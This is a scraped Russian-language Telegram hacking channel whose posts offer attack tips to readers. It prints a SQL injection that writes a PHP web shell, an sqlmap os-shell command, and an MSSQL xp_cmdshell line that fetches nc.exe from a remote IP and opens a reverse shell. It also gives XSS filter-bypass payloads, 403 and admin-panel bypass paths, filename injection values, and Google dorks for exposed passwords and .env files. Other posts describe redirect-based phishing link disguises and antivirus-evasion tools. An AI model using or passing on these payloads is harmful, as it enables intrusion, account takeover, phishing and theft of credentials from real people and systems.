SHADOW:Group
11.6K subscribers
106 photos
47 videos
19 files
821 links
Чат: @shadow_chat_tg

Рекламу не размещаю.

Админ - @shdwpwn
Download Telegram
📗 Macrome - инструмент для внедрения полезной нагрузки в файл Excel.

Macrome создает документ Excel, содержащий обфусцированный лист макросов, используя предоставленный документ и полезную нагрузку макроса.

Более подробно о том, что на самом деле делает этот инструмент, можно найти здесь и здесь.

#av #redteam #soft

Ссылка на Github
📄 Получение конфиденциальных данных с использованием .json

Один из трюков, которые можно попробовать в веб-приложении, для получения конфиденциальных данных. Обычно, срабатывает на приложениях, основанных на Ruby.

Запрос:
POST /ResetPassword HTTP/1.1
{"email":"victim@example.com"}

Ответ:
HTTP/1.1 200 OK

Однако, если попробовать добавить расширение .json:

Запрос:
POST /ResetPassword.json HTTP/1.1
{"email":"victim@example.com"}

Ответ:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}

В результате добавления расширения .json в наш запрос, был получен секретный токен!

#web
​​💉 Переход от SQL инъекции к шеллу или бэкдору

▫️Используем команду “into outfile” для записи в файл:

' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

▫️Захватываем запрос в Burp Proxy и сохраняем в файл post-request, затем запускаем sqlmap:

sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

▫️обратный шелл netcat через инъекцию mssql, когда доступен xp_cmdshell:

1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--

#web
​​📌 Методы обхода XSS фильтров

Вот список из 7 полезных методов, позволяющих обойти WAF (брандмауэр веб-приложений) при использовании XSS в веб-приложении:

▫️Проверьте, не блокирует ли брандмауэр только строчные буквы:
<sCRipT>alert(1)</sCRiPt>


▫️Попробуйте разбить регулярное выражение брандмауэра новой строкой "\r\n" (CRLF injection):
<script>%0d%0aalert(1)</script>


▫️Попробуйте двойное кодирование:
%253Cscript%253Ealert(1)%253C%252Fscript%253E


▫️Тестирование на рекурсивные фильтры, если брандмауэр удалит тэг <script>, у нас будет чистая полезная нагрузка:
<scr<script>ipt>alert(1);</scr</script>ipt>


▫️Инъекция анкор тега без пробелов:
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">


▫️Попробуйте обойти пробелы с помощью маркера:
<svg•onload=alert(1)>


▫️Попробуйте изменить метод запроса (POST вместо GET):
 GET /?q=xss

POST /
q=xss

#web
👍1
​​🎣 Несколько простых способов маскировки фишинговой ссылки
 
https://vk.com/away.php?photo435_33&to=ССЫЛКА_НА_ВАШ_САЙТ

https://www.youtube.com/redirect?q=ССЫЛКА_НА_ВАШ_САЙТ

https://www.google.com/url?q=ССЫЛКА_НА_ВАШ_САЙТ

https://m.ok.ru/dk?__dp=y&_prevCmd=altGroupMain&st.cln=off&st.cmd=outLinkWarning&st.rfn=ССЫЛКА_НА_ВАШ_САЙТ

Можно предварительно сократить с помощью Bitly или других сервисов сокращения ссылок.

#phishing
👍2
🧷 Изменяем URL для доступа к админ-панели

В некоторых случаях можно получить доступ к панели администратора, изменив URL следующим образом:

https://target.com/admin/ –> HTTP 302 (redirect to login page)
https://target.com/admin..;/ –> HTTP 200 OK
https://target.com/../admin –> HTTP 200 OK
https://target.com/whatever/..;/admin –> HTTP 200 OK

#web
🚫 Получаем доступ к закрытым ресурсам. Способы обхода ошибки 403 (403 Forbidden)

Если при обращению к директории вы видите ошибку 403 и доступ вам закрыт:

GET
/admin -> 403 Forbidden

вы можете попробовать следующие полезные нагрузки для обхода:

GET
/accessible/..;/admin -> 200 OK
/.;/admin -> 200 OK
/admin;/ -> 200 OK
/admin/~ -> 200 OK
/./admin/./ -> 200 OK
/admin?param -> 200 OK
/%2e/admin -> 200 OK
/admin# -> 200 OK

#web
👍2
Media is too big
VIEW IN TELEGRAM
🔓 Обход 2FA в Instagram через уязвимую страницу

Данный сценарий почти на грани фантастики, но все же, имеет место быть. Подойдет скорее для повторного доступа ко взломанной странице, если жертва смогла ее восстановить, поменяла пароль в инстаграм (но не поменяла на почте) и включила 2FA. При этом атакующий должен знать учетные данные от почты и аккаунта жертвы (они могут совпадать).

#bug
📤 SSRF (подделка запросов на стороне сервера) стоимостью 4913$

Не стоит думать, что в крупных компаниях не бывает уязвимостей и там уже все проверено. В данной статье будет рассмотрена уязвимость в HelloSign от DropBox, позволившая автору получить крупное вознаграждение за ее находку.

#web #ssrf

Читать статью
👍1
🔎 Shodan выкатывает бета-версию с новыми примерами фильтров для поиска

#web #shodan

https://beta.shodan.io/search/examples
​​🦠 PEzor - инструмент с открытым исходным кодом для обхода антивирусных решений

Реализацию и принцип работы данного инструмента можно почитать в блоге автора.

#redteam #av #malware

Ссылка на GitHub
​​📨 Получение других уязвимостей при загрузке файла

При тестировании функций загрузки файлов в веб-приложении попробуйте установить для имени файла следующие значения:

▫️ ../../../tmp/lol.png -> для уязвимости Path Traversal
▫️ sleep(10)-- -.jpg -> для SQL-инъекции
▫️ <svg onload=alert(document.domain)>.jpg/png -> для XSS
▫️ ; sleep 10; -> для command injection

Эти полезные нагрузки могут вызвать дополнительные уязвимости.

#web
​​📖 UltimateWDACBypassList

Централизованный ресурс, содержащий обширный список техник обхода Windows Defender Application Control (WDAC) с описанием и ссылками для каждой техники.

#av #redteam

Ссылка на GitHub
📚 Udemy: Pentesting and Security Web Application

Бесплатно только сегодня! Первоначальная цена курса 7 490 руб.

Скидка 100%
Промокод - EARLYBIRD

#web

Ссылка на курс
​​🔎 Небольшая подборка интересных Google дорков

▫️
FTP серверы и сайты
intitle:“index of” inurl:ftp after:2018

▫️Лог файлы с паролями:
allintext:password filetype:log after:2018

▫️
Файлы конфигураций с паролями:
filetype:env “DB_PASSWORD” after:2018

▫️Списки с email адресами:
filetype:xls inurl:“email.xls”

▫️Открытые камеры:
inurl:top.htm inurl:currenttime

#web #google
👍1